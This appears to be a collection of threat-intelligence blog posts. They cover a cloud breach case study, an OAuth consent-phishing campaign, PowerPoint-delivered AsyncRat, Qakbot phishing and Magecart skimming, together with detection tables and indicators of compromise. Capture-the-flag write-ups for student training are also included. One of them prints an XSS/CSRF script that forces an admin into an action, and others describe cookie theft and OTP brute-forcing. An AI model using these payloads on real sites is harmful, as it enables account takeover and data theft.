  • Cloud security needs a strategy: as threats to cloud mature, so should organisations’ strategies to secure their cloud systems. Cloud posture monitoring and cloud-specific Mitre ATT&CK TTPs detection use cases can help in identifying ongoing threats. Using existing blueprints for cloud deployment, a shift left approach to DevSecOps, and enhancing automation with infrastructure-as-a-code are important preventive measures that also help alleviate the ongoing scarcity of cyber talent.  

Trouble in Paradise

A case study of Cloud compromise

Many organisations are increasingly moving to cloud solutions to solve their hosting needs, but outsourcing workload should not imply outsourcing security as well. The importance of security the cloud was recently highlighted by targeting of Microsoft Azure environments by Nobellium, the threat actor behind the SolarWinds Orion compromise. The threat actor notably exploited stolen SAML certificates for vertical movement, a rarely seen technique. Even without novel techniques, less sophisticated cybercriminal threat actors can also pose a threat to companies’ services in the cloud. Indeed, this week’s supply chain compromise operation by REvil is suspected to have been launched from a compromised web server hosted on AWS.

The Incident

Recently, DarkLab’s incident response team has helped a South Asian client in the media sector to remediate an incident involving multiple cloud environments breaches, a case study we think can help organisations better plan for secure implementations of their cloud environments.

The incident originated from a likely exploitation of a known remote code execution vulnerability in a Jenkins instance, an open source software development automation server. The server was hosted in an Amazon Web Service (AWS) environment and had a hardcoded root access key. With that, the threat actor was able to roam the compromised environment undetected for four months. Logs availability has been an issue due to the lack of CloudTrail log retention but we know that the threat actor created multiple IAM user accounts and accessed internal data, including those stored in S3 buckets via the free Windows client S3 Browser.

Their primary intent, however, was to use the victim as a jumping spot to identify other targets vulnerable to the same Jenkins RCE and move laterally to their servers. They did so by deploying Linux and Windows virtual machines in new EC2  instances  in the compromised environment to scan and exploit external IP addresses. The did so using T.2 micro sizing to avoid spikes in usage and remain hidden. The attacker deployed the additional EC2 instances in a different AWS region than that used by the victim, an anomaly that we suggest organisations monitor for.

A deeper dive into the system log of the Linux VMs shows that the attacker likely used Shodan to identify other vulnerable Jenkins instances online, suggesting their targeting was likely opportunistic. Similarly, analysis of the IP addresses used by the attacker to access our client – most of them AWS instances themselves – suggests the attack likely originated from multiple other compromised organisations.

From AWS, the threat actor managed to access a FTP server within a parallel Google Cloud Platform (GCP) environment. For this, they used a compromised hard-coded credential found in one of the configuration files in their BitBucket repository, also suspected to be compromised. After thorough environment and users’ enumeration, the attacker was able to obtain the password for another G-Suite user account, which they used to access data in the GCP environment and Google Drive.

Shortly after accessing the GCP,  threat actors attempted to cover their tracks by deleting the company’s entire production environment, all hosted on AWS, and the backup copies. Fortunately, AWS retained some copies of the deleted backups which were able to provide to the victim organisation.

However, while the victim restored their AWS system they were not aware to reset the root access key. Unsurprisingly, the attacker quickly re-established a presence in their cloud and a few days later they re-deleted the production environment, although no ransom demand was recorded. This was when our incident response team was called to help.


Our investigation suggested that the threat actor behind this campaign is likely operating opportunistically and with a relatively low technical know-how. We often found traces of internet searches for open source tools or “how to” techniques. Nonetheless, such an actor could still pose significant operational damage to a large company by deleting their production environment.

The incident shows how even relatively unsophisticated threat actors are adopting an island-hopping approach by abusing imperfect implementations of commercial cloud platforms. Companies should ensure that standard security practices, like rotating passwords or access keys, monitoring suspicious activities, and prompt patching, are also applied to cloud environments.

What’s next?

Our experience suggests that this was not an uncommon attack path for adversaries targeting cloud environments. Monitoring for common attack vectors can help indeitifyuing supicious behaviour earlier and contain an incident before it is too late.

Below are some monitoring metrics mapped against Mitre ATT&CK tactics that we recommend organisations implement to AWS Config, Lambda, or their choice of CSPM platforms for automated detection and remediation.

Feel free to contact us at [threatintel at darklab dot hk] for the full set of 50 custom MITRE-based rules on AWS

TacticTechnique (custom)Log Source
Initial accessAWS user login failed multiple timesCloudTrail
Initial accessMultiple worldwide successful console login GuardDuty
Initial accessPotential Web scanning activities with multiple web server 400 error from same the source IPWeb access log
Privilege EscalationAWS “AssumeRole” from rare external AWS accountCloudTrail
DiscoveryAWS potential IAM enumeration ActivitiesCloudTrail
Defense Evasion/ PersistenceCreate/Update managed policy with excessive permissionCloudTrail
ImpactAWS Access Key EnabledCloudTrail
ExfiltrationEgress rule added to a security groupCloudTrail

Not Token for Granted

New phishing campaign against financial services steals OAuth tokens to bypass MFA in O365 accounts

DarkLab recently discovered a suspicious email which we identified as part of an active phishing campaign primarily targeting banks and investment companies worldwide, including a number of targets in Hong Kong. The campaign initially seemed aimed at stealing victims’ credentials, a common tactic among threat actors. However, a closer look showed that threat actors leveraged OAuth2 framework to gain permissions to the victim’s O365 account by exploiting a rogue Azure application. This would have allowed them to bypass multifactor authentication controls and directly access the victim’s account with a stolen OAuth token, rendering this a particularly effective social engineering tactic.

Overall, this campaign shows how financially motivated threat actors are evolving their tactics, techniques, and procedures to exploit companies’ increasing reliance on cloud infrastructure.

Phishing email analysis

The email is sent from a domain of a separate entity, likely compromised by the threat actor before initiating the attack against our client. The email metadata also suggests deliberate spoofing of the SMTP FROM header.

The email contains a fake e-signature verification request, along with a link to “Review and sign”.

The link is crafted to present the user with a request screen (see figure above) to grant permissions to a rogue Azure application. Depending on threat actors’ intent, permissions request can be modified to allow access to cloud-hosted documents and applications, including the email account.

Here is an example of the phishing link:

hxxps://login.windows.net/common/oauth2/authorize?response_type=code&client_id=70ab9cd5-96a5-4dee-b9af-xxxxxxxxxxxx&client_secret=ef17da38-f26c-49d9-9c9c-xxxxxxxxxxxx &redirect_uri=https%3A%2F%2Fkp3jccawgk[.]online&resource= https%3A%2F%2Fkp3jccawgk[.]online&state=xxxxxxxxxxxx #efe1b61bcf8df6b76595xxxxxxxxxxxx

The url above represents an access requested to the Microsoft Identity platform with a request for an authorization code, denoted by the response_type flied. The client_id field denotes the unique ID of an Azure application owned by the threat actor, with a redirect_uri field pointing to a domain – kp3jccawgk[.]online – staged by the threat actor to capture the redirected HTTP request once the victim grants the access permission.

To create such an attack infrastructure the threat actor only needs to register a rogue application under an Azure tenant, and to host a website to capture the URL requests and  authorization codes. The redirected site also contains JavaScript snippets that detect the accessing IP address and details of the victim organisation, very likely for victims’ profiling and filtering out potential accesses from security vendors.

Eventually, the victim is redirected to a blank page, now defunct.

Threat actors would then leverage the rogue application and request a valid access token with the authorization code. They could then access the victim’s O365 account with the permissions granted during the phishing process, and perform a variety of actions from accessing account information to sending emails on behalf of the victim.

This attack aims at stealing access tokens in form of OAuth. This allows direct access to a victim’s account and bypasses the need to steal valid user credentials, including multi-factor authentication.

Attack infrastructure and insights into the campaign

By pivoting on the redirect domain, we were able to identify multiple threat actors’ domains suggesting that they are very likely targeting banks, asset managers, equity firms, and in a lesser degree also law firms and consultancies around the world, including Hong Kong. According to domain registration data, the campaign started at the end of February and it is currently active. Based on the nature of its targeting the campaign appears to be financially-motivated.

Detection and remediation

To detect malicious behavior linked to a user falling victim to a similar phishing email, the most effective way is to monitor Azure audit logs for “Consent to Application” events. These represent users’ approval to grant permissions to third-party applications. Microsoft Cloud App Security is also a good location to detect new OAuth applications with high privileges in the tenant.

Sample Microsoft Azure log showing a Consent to Application event for a malicious Azure application

In the event where an internal user falls victim and consent is given to rogue application, IT teams can manually remediate the applied access under the “Enterprise Application” section of Microsoft Azure portal, and ensure that the user credentials are reset and protected by MFA. As a preventive measure, IT teams are also recommended to leverage the Azure AD Admin Consent to force administrator involvement to gatekeep user data against such kind of attack tactic.

Indicators of compromise

  • 188.166.68[.]51
  • kp3jccawgk[.]online
  • 17l78xgnzj[.]online
  • 4zl8t4sqon[.]online
  • 9ybzef6d2h[.]online
  • cprapid[.]com
  • cts1g02r2c[.]online
  • kp3jccawgk[.]online
  • l7p5g1kwh4[.]online
  • num7ewnkn1[.]online
  • rh6757nysb[.]online
  • wbxputufpj[.]online
  • wzoschqdd0[.]online

Hackaday 2020 – Securing the basics [P-3]

Incident Response and Threat Intelligence Challenge

As we mentioned in our previous posts on the Web and Cloud challenges, every year DarkLab organises a capture the flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year! In this post we cover the Incident Response (IR) and Threat Intelligence (TI) questions.

Ransomware Attack Again 1 (50 pts, 14 solves)

Description: Our client has been hit by a ransomware attack. While the rest of the client’s PCs have been restored, the head of IT insists to decrypt the data to recover an important screenshot of server settings and passwords. They refuse to pay the ransom. The sysadmin left only the snapshot of the infected server.

It seems there is not much left to see. We’re reaching out to you, our best malware analyst, to help research and find a way to decrypt the screenshot.

RDP: hackaday2020-teamX-ransomware.eastasia.cloudapp.azure.com ,  X is your team number

After connecting via RDP to the machine, we can see another user named sysadmin by navigating around the file system. On that user desktop, the following are found :

  • Ransomware affected file with extension HKADYYY
  • Ransom note HKADYYY-README, containing a flag


Ransomware Attack Again 2 (100 pts, 7 solves)

Description: Other than the ransom note, what other artefacts could you find?

By navigating the windows event logs, we notice a suspicious code snippet under powershell – large base64 payload (powershell with -e option).

The following two values are found by decoding the base64

  • Caller script : . $prog -InV 'MTIzNDU2Nzg5MDEyMzQ1Ng=='
  • Second flag


Ransomware Attack Again 3 (50 pts, 2 solves)

Description: sometimes there is public research on the ransomware behavior which may help you to decrypt the files. Try to surf the net!

A search online will not reveal much, until you check on Twitter, where you will find the following tweet.

The tweet contains the following link : https://0bin.net/paste/xBy4OoNz#0lSty7wpQSy2risE3g6X2Idj4HTNyhy6YaUgeWBmC0-

This 0bin.net post includes a small summary of the ransomware, a decryption routine, and the third flag hackaday{Blrdi3 w!th th3 g00d n@vvS}

Ransomware Attack Again 4 (300 pts, 0 solves)

Description: You are in the final step, tell me the content of the decrypted file!

According to the decryption routine, successful decryption requires two values :

  1. IV : Given by base64 string located in the loader : MTIzNDU2Nzg5MDEyMzQ1Ng==
  • Key-seed : random two-digit and the SID (obtained by checking the user that executed the ransomware i.e. sysadmin)

00S-1-5-21-1580626154-3826959220-856111413-500 to 99S-1-5-21-1580626154-3826959220-856111413-500

The following decryption code is implemented with the IV and Key (two digit is 99):

$IV = "MTIzNDU2Nzg5MDEyMzQ1Ng=="
$Key = "ODgxM2QyOTU4ZjljODAzOGVjMDhiMjljYjFjODgzMGM="
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
$aesManaged.Key = [System.Convert]::FromBase64String($Key) 
$decryptor = $aesManaged.CreateDecryptor();
$fileToDecrypt = "C:\path\to\encrypted\file.HKADYYY"
$encryptedFile = [System.IO.File]::ReadAllBytes($fileToDecrypt)
$bytes = $encryptedFile
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
Rename-Item -Path $fileToDecrypt -NewName ($fileToDecrypt.Substring(0, ($fileToDecrypt.Length - 8)))

Using the routine to decrypt the file:

Decryption routine will reveal the final flag


That’s is for this blog series, we hope you enjoyed reading and looking forward to seeing you at Hackaday 2021!

Hackaday 2020 – Securing the basics [P-2]

Cloud Challenge

Every year, DarkLab organises a Capture the Flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year!

Make it Rain in the Bucket (50 pts, 14 solves)

Description: Unintended sensitive information disclosure comes in many shapes and forms.  You would be surprised with the information you can find through detailed enumeration and a bit of online research.  Can you unlock the secrets within to take you to the next part of the network? http://www.hackaday.info

P.S. AWS account is not required for this question

This first challenge is meant to emulate an unsecured AWS s3 bucket. The website hackaday.info is a static webpage hosted as an AWS S3 bucket. When hosting a website as an AWS S3 bucket, the bucket name (hackday.info) must match the domain name (hackday.info).  By enumerating the site with a ping request, we get the following data:

The ping returns with the domain name s3-website.ap-east-1.amazon.com. If we access the domain, it will return the objects stored in the bucket.

An interesting file should catch your attention – admin_users_only/useraccess.txt -which contains the first flag.

Keys behind the wall (100 pts, 8 solves)

Description: There might be something insecure with this web application, if you could find the keys behind this application, you are one step closer to the image. The flag format is hackadayxxxxxxx

This challenge was meant to emulate a SSRF vulnerability in the application hosted on an AWS EC2 instance.

The SSRF attack allows to request the metadata of the EC2 instance. In AWS the metadata can be access by browsing to

As shown below, the AccessKeyId, SecretAccessKey and token are exposed, and an attacker could then impersonate the role attached on the machine using the temporary credentials and conduct additional discovery. The second flag is the role name.

Secret in the Image (200 pts, 1 solves)

Description: The secret lies in the image

This challenge was meant to emulate a misconfigured AMI-image which allows public access. With the credentials for programmatic access to AWS obtained from the second challenge, we can use our own AWS account to impersonate the role by changing the authentication file ~/.aws/credentials.

Once we assume the role, we can start enumerating the policies attached to the role to determine the level of privilege that the role has.

As shown above, the role has two policies attached. The hackadaypolicy is a custom policy created for this role. The next step would be to enumerate the hackadaypolicy to determine what permissions are assigned in the policy.

The screenshot above shows all the permissions that are assigned to the policy. If we enumerate all the permission given, we would stumble upon ec2:DescribeImage which has the parameter set to public = true with the AMI-ID shown.

This shows that the AMI-image created by this role is set to public, which allows everyone with an AWS account to access it.

We can then search for the instance from the community AMI group and launch the instance.

Once we launch the AMI , the 3rd flag can be found under the /tmp folder of the EC2 instance.

That’s it for this challenge, stay tuned for the third and last post which will walk through the Incident Response and Threat Intelligence challenge.

Hackaday 2020 – Securing the basics [P-1]

Web Challenge

Every year, DarkLab organises a Capture the Flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year!

Web Challenge – With great power comes great responsibility!

Hackaday Chat System 1 (100 pts, 4 solves)

This challenge is meant to exploit the broken access controls of a website. After registering and login with an account, you will notice that there are several accounts created (i.e. operator_day1, admin_day1, admin_day2) from the “Select User” drop-down list. The account operator_day1 will be our target for this challenge.

The key element is the user’s UUID form in the user profile page. The user’s UUID for this system is crafted from MD5 hash of the user email. Using an md5 generator, we are able access the profile page of operator_day1 by entering /profile.php?uuid=14a7a7da8dfcba61a4af2b695a553cf0.

Inside operator_day1 profile page, we can retrieve the password SHA256 hash of the user. Using an online hash cracking site, we are able to recover the plaintext password of the operator’s account.

After logging in with the operator account, the flag will be displayed at the chat box.

Hackaday Chat System 2 (150 pts, 1 solve)

This challenge is an extension of the Chat System 1. This time, the account admin_day1 will be our target.

In the operator_day1’s profile, a new endpoint – updateUser.php – is available to update username or password. However, after clicking the button, an error message is prompted saying the naming function is in maintenance.

Using a web proxy tool, we can change the “from” data of the request to delete the name changing parameter. As the endpoint is also vulnerable to parameter injection, adding a new data field “role” would grant us the role of the user.

Here we crafted a request to change the role of operator_day1 to administrator, which is same as the role of admin_day1.

With administrator privileges, we can now change the password of admin_day1 to another one of our choice. (Note that UUID in the request is the one from the admin_day1 account)

After logging in to the system with admin_day1 account, we can retrieve the flag in the chat box.

OTP Member Portal (150 pts, 0 solves)

Description: Multi-factor authentication (MFA) is an electronic authentication method in which user is granted access to a website or application only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism: knowledge (something only the user knows), possession (something only the user has), and inherence (something only the user is) – SUPER SAFE!

This challenge aims to bypass the password login process and brute force weak a MFA system.

Once you register an account in the system and complete a normal login process, you can notice that:

  1. You would need an account from Hackaday Chat System in order to receive OTP
  2. The OTP is 3-digit code from 100-999
  3. Account will be locked after 5 incorrect OTP login attempts
  4. You can send request to reset the fail counts and the OTP
  5. The target account of this challenge is admin_day2@hackaday.com
  6. Exploiting the target account in Hackaday Chat System would not work since admins will not receive OTP from chat system
  7. The normal login process is represented in the below graph

The point of exploitation is from the password login. Due to broken access control, after the “password incorrect” message is prompted, we can still access the OTP login page directly with the target account information embedded in the PHP session.

You could therefore write a script to exploit the system by bruteforcing the OTP system:

  1. Login on the account admin_day2@hackaday.com with random password
  2. After seeing the “password incorrect” message, directly access /OTPlogin.php
  3. Brute force the OTP at maximum 4 times
  4. Submit request to resend OTP if all attempts failed
  5. Repeat step 3 and 4 until the OTP login is successful
  6. Access member.php with the same PHP session

A sample program written in Go (otp-sample.go) is provided for reference.

After finishing the above steps, the flag will be displayed at profile.php.

OTP Admin Portal (100 pts, 0 solves)

This challenge aims to exploit the file uploading feature in the system. We are allowed to upload any files to the system with the only limitation being on file size. After uploading a .htaccess file with directory listing enabled (‘Options +Indexes’), we can find the flag with the link provided.

Simple Message Board (250 pts, 3 solves)

Description: I found a message board online and seems that there is a secret hiding which can be only access by the admin. Do you know how to get the secret?

This challenge is aimed at exploiting the message board system with Cross-site scripting (XSS) and/ or Cross-Site Request Forgery (CSRF).

In the message board system, we are given three functions: one for posting a message to the board, one for clearing the log, and one for getting the flag.

It is observed that:

  1. Someone (likely the admin) is frequently accessing the board and clearing logs
  2. Both name and message fields are vulnerable to XSS
  3. There is a hidden field (csrf_token) in the “Get Flag” form
  4. There are PHP session ID and a field named “Admin” in the cookie, changing the value of “Admin” field to “Admin” will not work also

The target of this challenge is to force admin to somehow click the “Get Flag” function or steal the session (cookies) from the admin.

Solution 1

To solve the challenge, we could write a script to force admin to access the “Get Flag” function:



      var xhr = new XMLHttpRequest();

      xhr.open("POST", "getflag.php");

      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

      xhr.send("csrf_token=" + document.querySelector("input[name=csrf_token]").value);

}, 1)


The script will do the following procedures:

  1. Query the value of csrf_token in the page
  2. Send a form request to getflag.php to trigger the function

As there may be situations that the script run without csrf_token properly loaded, some time delay (such as using settimeout, onerror etc.) is required such that the script would be executed successfully on the admin side.

After sending the script to the board and wait for a second, the flag will be shown on the board.

Solution 2

To tackle the challenge, we could setup a listener (e.g. pastebin) for receiving http request and send the following script to the message board:


By using this script, if admin accessed the message board, a HTTP GET request will be sent to our requestbin service with all cookies logged.

After a short waiting, we will receive the above request with the information we need.

With the cookies of the admin account, we can now get the flag by clicking the “Get Flag” button.

Stay tuned for the second part of this blog series: Cloud challenge.

Presentation is Key

Criminals exploit PowerPoint documents and blog infrastructure to deliver RAT and steal cryptocurrency

DarkLab has recently responded to cybercriminal phishing attempts in APAC exploiting unusual tactics, techniques and procedures (TTPs). While most phishing we observe contain MS Word or Excel attachments, this one exploited malicious PowerPoint (.ppt) files to eventually deploy AsyncRat malware and a bitcoin stealer.

Exploitation of PowerPoint attachments is not entirely new. However, it is rare enough to remain uncommon and therefore increase the chances that unaware users would open malicious attachments.

This phishing campaign, likely still active, appears to be focused on Asia, particularly China, although we also found samples uploaded on a popular multi-vendor AV scanner from countries in Europe.  Most of the titles of the malicious documents are generic. However, the use of titles such as “Hotel Doc” for some of their lures suggests that the hospitality industry is one of the sectors targeted.

Phishing lure analysis

The first phishing email we picked up caught our attention for its use of Traditional Chinese characters used in Hong Kong and Taiwan, as opposed to the Simplified Chinese used in Mainland China. The email included a malicious PowerPoint attachment named 付款詳情.ppt [MD5:
8311c59ef727826c4b54e182a956e312], which contains malicious and obfuscated macros. The macro only  executes when the file is closed by the user, in a likely attempt to avoid raising the victim’s suspicion.

Fig 1 – Deobfuscated payload [MD5: 127538a7d8703ec96a5e39e9fd235c06]

After deobfuscation it is clear that the VBA macro leverages the legitimate binary mshta.exe to connect to a hardcoded URL masked with the j.mp URL shortening service. The hardcoded URL eventually redirects to tumharimaakachodamarunmaine[.]blogspot[.]com/p/3-sunda-10-origin[.]html

Attack infrastructure and timeline

J.mp is a separate address for the better known bit.ly shortening service. According to bitly’s statistics, the malicious URL discovered was created at the end of February.

Fig 2 – bitly creation data for the malicious URL

The URL points to a server used by the threat actor to stage a range of malicious payloads, from cryptocurrency stealers to an open source remote access trojan (RAT). We will get to that in a second.

Pivoting on the identified staging server revealed a significant number of additional attack infrastructure, a new URL for each phishing document. These servers were all hidden behind the same j.mp shortening server and hosted on Blogspot infrastructure.

By checking the URLs creation date on bitly we were able to get a timeline of the malicious campaign, which shows how the threat actor behind it has been active since the beginning of the year and has recently increased their activity.

Fig 3 – timeline of attack infrastructure set up


In terms of payload, we could only examine one malicious URL [Tumharimaakachodamarunmain[.]blogspot[.]com/p/42[.]html] and found a number of scripts. We suspect that other URLs may host different payloads.

Fig 3 – Screenshot of the malicious webpage

The webpage looks benign at first glance. However, accessing it with MSHTA triggers on the victim’s endpoint a number of JavaScript payloads embedded on the website.

The first script executes a set of VBScripts that fetch the content of the following link:


The file is deobfuscated and dropped on %Public%\bin.vbs before execution, and it aims at disabling security controls for subsequent malware executions.

Fig 4 – First script disables system’s security settings

The second script reaches out to the following URL, again with MSHTA : mylundisfarbigthenyouthink.blogspot.com/p/42.html

It contains three additional payloads to disable security defences and hiding attackers’ windows to hide malicious activity.

Then, an additional PowerShell script is executed by loading the script from two additional sites depending on the system architecture.



The payload will reflectively load two additional samples: a heavily obfuscated DLL with anti-analysis mechanisms [MD5: d1a426b9afe2ca1e56cdf48523c684e3], and an open source RAT called AsyncRat [MD5: 47c012de1faac9be5a860b600a06c5ee].

AsyncRat is able to send and receive commands, record keystrokes and screenshots, and upload/download files via SFTP, among other functions.

The threat actors also tries to steal victims’ cryptocurrencies by replacing the legitimate wallet address with one controlled by the attackers. This is done via the Powershell script shown below that looks for BTC wallets addresses in the clipboard and and replaces them with another one. Our research into the attacker’s BTC address shows that it had two small transactions, suggesting the attacker had so far only limited success.

Fig 4 – PowerShell script for cryptocurrency theft

Finally, the last script downloaded from the stager domain attempts to terminate instances of excel.exe and winword.exe in attempt to hide attacker’s tracks.


The attacker’s exploitation of open source malware and abuse freely available Blogspot URLs as malicious infrastructure highlights the increasing lowering barrier of entry for cybercriminal operations in Asia. Despite the relatively low-level nature of this threat in terms of technical sophistication, the use of malicious PowerPoint attachments shows some innovation in their social engineering tactics. Overall, this campaign shows how even low-cost but complex cybercriminal campaigns can pose a threat to organisations by leveraging unusual social engineering techniques and open source tools.

Indicators of Compromise

  • tumharimaakachodamarunmaine.blogspot.com
  • tumharimaakachodamarunmain.blogspot.com
  • ifyouarebadtheniamyourdadhehe.blogspot.com
  • myralundpakarloab.blogspot.com
  • mylunissharp.blogspot.com
  • mylundisfarbigthenyouthink.blogspot.com
  • 8311c59ef727826c4b54e182a956e312
  • d1a426b9afe2ca1e56cdf48523c684e3
  • 47c012de1faac9be5a860b600a06c5ee
  • f7fd745b52fb8e791254492eca2c41df9281430dcbc5b56baa715b32eeb417ed
  • ae133004d194c3701d0b2051904d07ad69c901830a710cc2de6cb465c67bdc9d
  • 015224452b3232f76924d4020b45cfc954b80a4f14563d9fe7dadffb1699f090
  • 4be0a1ade0230dc10ef523d30d3f28ab1e70a4b5587086edfcdbfa9b30fb9c9a
  • a07e7d0a6699cbcb960bbe8c3a34b85a878abda0d19cd98d2e0ce170369c7ccf
  • d925e0405f8b9a4c0c06751a36318bcccd54721c107c08dc851fec12b58ec9ab
  • 78599a0757c19b98f6d5ec650a5f80181f90117215edcf5f79c7099c12f9710a
  • 4199e3e42abb7d71ca8183609e80225014ce4b232990d526ec0655b889aac5fd
  • 46730c85c3da44a3bfc2d4786db1bf1b0f13a0c523c3b7ae88749b3538d1b8c1
  • 4f0d613797aa59fbcb957162c37d586e020cfb65a886972b404bbda4473d0b5e
  • 65bbecd4400d257e8eb367b56ec846de4e4efaf3274622fd01c8751adde5d30b
  • 266ffecbcb98bd2401298ca8fbe8bdc9df9fd8ebdfee8acf267a43cedd870050
  • f9498a2b0d6c38da6ad465a0135c5d20817bffeaf5ed09b9de8a7a22ec1ada58
  • 4a90be311633d5052b7ef4c6edd0ccddd472daab1ce183af0763b69d47ce4406
  • dc36dea840aec26090afba82b6a93f706b73c850286e6d80d95bf0604cc72d43
  • 9da6a119d0986bb18a84cef88915c5934074d189b57c0ee62103b24549f1fd51
  • 78599a0757c19b98f6d5ec650a5f80181f90117215edcf5f79c7099c12f9710a

Robber Duck

Qakbot goes phishing in Hong Kong

Since the beginning of 2021, DarkLab analysts have observed multiple clients and third-party organisations in Hong Kong targeted with malicious phishing emails aimed at delivering the Qakbot malware, also referred to as Quakbot or Qbot. While the Qakbot payload is well researched in open source, we want to shed light on the observed attack chain to raise awareness of this threat and help mitigate future phishing attempts against organisations in Hong Kong and APAC.

Since the takedown of Emotet, one of the largest spam botnets and initial access broker, cybercriminals behind Qakbot have increased their operational tempo and are actively targeting  Hong Kong. We therefore expect Qakbot to remain a threat for the region in the coming months, particularly due to Qakbot links to known ransomware families.

Infection chain

Qakbot started as a banking trojan in 2009 but has since 2019 been seen exfiltrating sensitive financial data and email threads from victims, as well as delivering the ProLock ransomware.

The phishing emails we observed were sent from likely compromised third party companies. These previous victims were based around the globe, from South America to Asia, highlighting the global scope of Qakbot’s operations.

The email’s subject and text suggest the threat actors have hijacked email threads to add a layer of credibility to their phishing lures. In one case, a phishing email to a large company in the real estate sector referred to an existing high-profile event that the target organises each year, likely suggesting the phishing attempt was somewhat targeted rather than completely opportunistic.

Fig 1 – phishing email to a property developer delivering QakBot malware

Other phishing emails, like one sent to a retail organisation (see below), threat actors attempted to spoof the sender to make it look like it was coming from an organisation based in Hong Kong.

Fig 2 – phishing email to a retailer delivering QakBot malware

The emails have a compressed archive attached, containing a macro-enabled Excel document.

Fig 3 – overview of Qakbot infection chain

The latter displays a generic DocuSign template and requires user interaction to activate the malicious macros hidden in the workbook.

Fig 3 – phishing lure used to deliver QakBot malware

We analysed one such lure document [filename: Document_1204144908-12232020-Copy.xlsm ; MD5: 77a6bf34403b2a4e6e2eaa4435d22b50] which executes macros that serve as a dropper. The dropper contacts one of five command and control (C2) URLs in an attempt to download the same file called, in this case, 55555555555.jpg, a DLL file containing the second stage of the malware. Other droppers analysed also showed similar behavior despite the different stager servers and DLL names dropped.

We also found numerous documents similar to the one we analysed, reinforcing how this was indeed part of a larger phishing campaign.

Fig 4 – Example of similar phishing documents on Virus Total

The macro eventually starts the malicious DLL [MD5: 66adf2e8e5561bf7cf3f3cb50d9256bf] run via rundll32.exe, a technique used by threat actors to proxy execute malicious code while avoiding detection by security systems.

Fig 5 – Qakbot execution of malicious DLL via legitimate process

This specific campaign is linked to one of Qakbot’s botnets called abc117, while security researchers have linked other botnets, like abc123, to spam campaigns in other parts of the world. Malware operators often use different botnets to ensure resilience from law enforcement action and their ability to deliver malware to a wider range of targets.


Despite the successful law enforcement action against one of the largest spam botnets, Emotet, in January, our findings suggest that other botnets are ready to step into the vacant spot left by it.

Operations like Qakbot show how phishing will remain a significant threat for companies in Hong Kong, as threat actors use similar malware to obtain an initial foothold in companies’ networks and to deploy further malware, like human-operated ransomware.

Strong email security processes and users’ awareness remain paramount to avoid initial infection from similar phishing campaigns that can lead to very impactful ransomware incidents. Threat feeds can also help detect often-changing attack infrastructure of botnets like Qakbot by providing up-to-date indicators of compromise for ingestion of security detection systems. In particular, we found that URLhaus’ database contains a useful source of malware URLs for Qakbot that can aid network defenders.

C2 servers hardcoded in Qakbot DLL analysed

Note that not all the below IPs are likely to be still actively used for malicious purposes, please apply caution when using them for blocking.

Criminal Shopping Habits

Cyber threats to the retail sector

The retail industry is increasingly gearing towards e-commerce platforms and cashless, even contactless, payments – a trend accelerated by the Covid-19 pandemic.

Even before that in 2020 41% of shoppers said they would purchase items online for things they would normally go to the store for. In 2019, 53% of Hong Kong residents tried to be completely cashless, according to Visa. The retail and consumer landscape is clearly changing rapidly, and cyber threats facing the industry are following accordingly.

As payments increasingly move online, so do cybercriminals’ attempt to steal payment card data. Traditional point of sale (POS) malware attempts to steal customers data by infecting retailers’ POS devices. While still present, POS malware is losing effectiveness due to increasingly secure cards standards like EMV, and because of the growing use of contactless payments, including mobile payment systems like Apple Pay and Google Pay.

Consumers’ growing appetite for ecommerce has therefore led criminals to adopt new tactics. One of the most widespread includes stealing payment data on ecommerce websites by injecting malicious JavaScript skimmers in checkout pages, a technique known as Magecart.

The growing threat of web skimmers

Magecart is a common and hard to detect threat for online retailers. Researchers estimate that every 15 seconds one e-commerce website is infected with MageCart malicious code. Some large scale Magecart operations have compromised thousands of websites at a time, including about 2000 e-commerce sites in just three days in September. Criminals injected malicious JavaScript code likely via outdated v1 and v2 versions of the Magento e-commerce platform.

Compromise of popular third-party e-commerce platforms like Magento allows criminals to automatically deploy JavaScript skimmers on hundreds of vulnerable victims at the same time. Indeed, the name Magecart itself refers to this common intrusion vector (Magecart = Magento + shopping Cart).

Magecart supply chain compromise are widespread. However, websites can also be targeted in direct operations by exploiting existing vulnerabilities. Malicious changes to check out pages are often minimal and hard to detect. Criminals can just append a few lines of code to a legitimate JavaScript library to avoid detection. A US precious metal retailer this year discovered that Magecart card-stealing code was present on their website for some five months, likely affecting tens of thousands of customers. The incident highlights the stealth and long term impact that a Magecart compromise can have on retailers.

Example of Magecart compromise

Human-operated Ransomware

Although customers’ data are a precious criminal commodity, cybercriminals also target retailers’ networks for extortion. Human-operated ransomware, in particular, is among the most impactful and widespread threat that DarkLab analysts have observed targeting Hong Kong organisation in 2020.

